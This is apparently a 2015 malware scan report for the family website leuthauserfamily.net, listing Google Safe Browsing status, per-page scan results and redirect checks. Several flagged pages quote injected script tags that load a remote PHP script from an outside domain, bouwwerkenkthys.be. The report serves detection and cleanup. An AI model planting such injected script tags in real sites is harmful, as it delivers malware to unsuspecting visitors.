Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leuthauserfamily.net
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://leuthauserfamily.net/ | 200 OK Content-Length: 5488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) | ||
http://leuthauserfamily.net/pictures.htm | 200 OK Content-Length: 5073 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490513"></script> | ||
http://leuthauserfamily.net/index.htm | 200 OK Content-Length: 5488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) | ||
http://leuthauserfamily.net/movies.htm | 200 OK Content-Length: 1769 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490511"></script> | ||
http://leuthauserfamily.net/contact.htm | 200 OK Content-Length: 4770 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490508"></script> | ||
http://leuthauserfamily.net/news.htm | 200 OK Content-Length: 10729 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490512"></script> | ||
http://leuthauserfamily.net/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:10 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://leuthauserfamily.net/js/selectBox/jquery.selectBox.min.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:12 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://leuthauserfamily.net/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:13 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://leuthauserfamily.net/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:14 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://leuthauserfamily.net/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:15 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://leuthauserfamily.net/poker.zip | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:15 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leuthauserfamily.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 21:44:06 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 5488
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2014 13:34:44 GMT
...5488 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leuthauserfamily.net
Referer: http://www.google.com/search?q=leuthauserfamily.net
Result:
The result is similar to the first query. There are no suspicious redirects found.